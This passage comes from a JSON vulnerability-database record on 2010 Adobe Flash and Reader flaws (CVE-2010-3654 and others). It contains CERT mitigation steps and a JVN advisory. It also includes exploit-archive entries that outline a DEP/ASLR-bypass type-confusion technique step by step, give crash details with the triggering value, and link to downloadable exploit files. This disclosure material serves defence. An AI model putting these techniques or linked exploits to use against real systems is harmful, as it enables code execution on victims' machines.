2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `JavaScript` section.\n 5. Uncheck the `Enable Acrobat JavaScript` checkbox.\nDisabling JavaScript will not resolve the vulnerabilities, it will only disable the vulnerable JavaScript component. When JavaScript is disabled, Adobe Reader and Acrobat prompt to re-enable JavaScript when opening a PDF that contains JavaScript. \n \n**Prevent Internet Explorer from automatically opening PDF documents** \n \nThe installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to the safer option of prompting the user by importing the following as a .REG file: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CLASSES_ROOT\\AcroExch.Document.7]` \n`\"EditFlags\"=hex:00,00,00,00` \n**Disable the displaying of PDF documents in the web browser** \n \nPreventing PDF documents from opening inside a web browser reduces the attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo prevent PDF documents from automatically opening in a web browser with Adobe Reader:\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `Internet` section.\n 5. Uncheck the `Display PDF in browser` checkbox.\n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. Microsoft has published detailed technical information about DEP in Security Research &amp; Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). DEP should be used in conjunction with the application of patches or other mitigations described in this document. \n--- \n \n### Vendor Information\n\n298081\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Adobe __ Affected\n\nNotified: October 27, 2010 Updated: November 17, 2010 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSee below.\n\n### Vendor References\n\n * <http://www.adobe.com/support/security/advisories/apsa10-05.html>\n * <http://www.adobe.com/support/security/bulletins/apsb10-26.html>\n * <http://www.adobe.com/support/security/bulletins/apsb10-28.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.adobe.com/support/security/bulletins/apsb10-26.html>\n * <http://www.adobe.com/support/security/advisories/apsa10-05.html>\n * <http://www.adobe.com/support/security/bulletins/apsb10-28.html>\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-3654](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-3654>) \n---|--- \n**Severity Metric:** | 43.54 \n**Date Public:** | 2010-10-28 \n**Date First Published:** | 2010-10-28 \n**Date Last Updated: ** | 2010-11-17 17:39 UTC \n**Document Revision: ** | 27 \n", "modified": "2010-11-17T17:39:00", "published": "2010-10-28T00:00:00", "id": "VU:298081", "href": "https://www.kb.cert.org/vuls/id/298081", "type": "cert", "title": "Adobe Flash code execution vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Flash Player 10.1.53.64 - Action Script Type Confusion (ASLR + DEP Bypass)", "edition": 1, "published": "2011-04-19T00:00:00", "title": "Adobe Flash Player 10.1.53.64 - Action Script Type Confusion (ASLR + DEP Bypass)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2011-04-19T00:00:00", "id": "EXPLOITPACK:3AD9D29B4D1CC018F70F8B0E9B899EC2", "href": "", "sourceData": "Source: http://www.abysssec.com/blog/2011/04/exploiting-adobe-flash-player-on-windows-7/\n\nAdobe Flash player Action script type confusion exploit (DEP+ASLR bypass)\n\nadvisory text : \n\nHere is another reliable windows 7 exploit . the main method used for exploitation is based on Haifei-li presentation at CanSecWest. \nbut as exploit code not relased and a lot of peoples like to see exploit code here is our code . \n\nexploitation detail :\nFor exploitation purpose on recent protections on windows 7 without any 3rd party (well flash is not 3rd party todays) , it is possible to use the same bug many times to leak the imageBase address and payload address. In our exploit we used three confusion to read String Objects address and accordingly imagebase address.\n\nStep1: read shellcode string object pointer by confusing it with uint and use it to leak ImageBase.\nStep2: leak address of the shellcode with the same pointer and NewNumber trick.\nStep3: send imageBase & shellcode address as parameters to the RopPayload function, develop Rop payload string and again confuse the return value with uint to read address of RopPayload string.\nStep4: send address of the rop payload as parameters to the last confused function that confuses string type with class object. And thus address of our rop payload will be used as vtable in the fake class object.\nNote: In using strings as a buffer for shellcode in action script, it is important to use alphanumeric characters because the toString method converts our ascii character set to uincode thus make our shellcode unusable.\n\nHere you can get our reliable exploit against windows 7 :\ncalc.exe payload\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17187.zip (CVE-2010-3654_Win7.zip)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Flash - ActionIf Integer Denial of Service", "edition": 1, "published": "2010-11-05T00:00:00", "title": "Adobe Flash - ActionIf Integer Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3639"], "modified": "2010-11-05T00:00:00", "id": "EXPLOITPACK:92497A482BC4B4CFEF587918EBBCB69E", "href": "", "sourceData": "Adobe Flash Integer Overflow \nAuthor: Matthew Bergin\nDate: June 15, 2010\nVersions Affected: Flash10e.ocx v10.0.45.2\n\t\t Flash10c.ocx v10.0.32.18 r32\nRoot Cause: ActionScript, \"ActionIf\"\nAffect: Denial-of-Service, possible Command Execution\nCVE: CVE-2010-3639\nDesc: When Parsing an ActionIf ActionScript statement four args are passed\n to the function, an integer named i , a ubyte named ActionCode, a ushort\n named Length, and a short named BranchOffset. If the BranchOffset is -305 or \n smaller it will cause an Access Violation when reading data from a \n invalid memory address. The last 16-bits of the address are controlable\n with the size of the BranchOffset argument. Any data which is in a valid\n segment of memory near the controlled address can be read causing Memory\n Disclosure. This would be used well in combination with a memory corruption\n vulnerability in order to bypass ASLR. \n\n In doing my initial research I found a lot of interesting things along the way.\n Flash10c is not vulnerable in the same way Flash10e is. I initially discovered\n the integer overflow in Flash10c while fuzzing SWF. I didnt fuzz it via a web\n browser but instead used a free application which uses the modules in a more\n direct manner. Flash10c is not able to be attacked via a browser as far as I\n have been able to tell. However, I have found during my research that Flash10e\n is loaded as a module when any Flash object is encountered. I am unsure as to\n if this is a configuration issue or not. In addition to this, while debugging\n this issue I found that both versions have a self-changing CRC which inhibits\n keeping break points set.\n\n Another interesting note is that when confirming the PoC on Flash Movie Player\n i noticed that if you open the file with the File -> Open drop down menu, the\n PoC will not hit the vulnerable code causing a crash. However, if you register\n the swf extension to Flash Movie Player and \"double-click\" the PoC file to run\n it, Flash Movie Player will hit the vulnerable code every time. \n\n The PoC code would be best embedded into HTML for remote attacks but can be\n attacked in any manner in which Flash10c.ocx/Flash10e.ocx are loaded as modules\n into memory.\n\n\nFuzzed Application: EolSoft Flash Movie Player (downloads.cnet.com) v1.5\n\nCrash Details:\n\nAccess Violation\nException caught at 1009cb23 mov al,[eax+ecx]\nEAX:0267010c EBX:00e990b4 ECX:fffffef3 EDX:00e9b038\nESI:00e80000 EDI:00e990b0 ESP:0012f780 EBP:0012f99c\n\nReversing:\n\nstruct SWFTAG Tag[7], value DoAction\nstruct ACTIONRECORD ActionTag[6], value ActionIf, starts @ E3h size 5h\nint i, value 0\nubyte ActionCode, value 157\nushort Length, value 2\nshort BranchOffset, value -305\n\nBranchOffset is located @ E6h-E7h\n\nPoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "jvn": [{"lastseen": "2019-05-29T17:21:53", "bulletinFamily": "info", "cvelist": ["CVE-2010-3636"], "description": "\n ## Description\n\nWhen Flash Player references a different website than the site where Flash contents are hosted, the referenced site must be allowed access by the cross-domain policy file. \n \nFlash Player contains a vulnerability where access restrictions set by the cross-domain policy file may be bypassed.\n\n ## Impact\n\nCross-domain policy restrictions can be bypassed by using a specially crafted web page. This could result in unauthorized access to website data.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * Adobe Flash Player 10.1.85.3 and earlier for Windows, Macintosh, Linux, and Solaris\n * Adobe Flash Player 10.1.95.1 for Android\n", "edition": 4, "modified": "2010-11-09T00:00:00", "published": "2010-11-09T00:00:00", "id": "JVN:48425028", "href": "http://jvn.jp/en/jp/JVN48425028/index.html", "title": "JVN#48425028: Flash Player access restriction bypass vulnerability", "type": "jvn", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}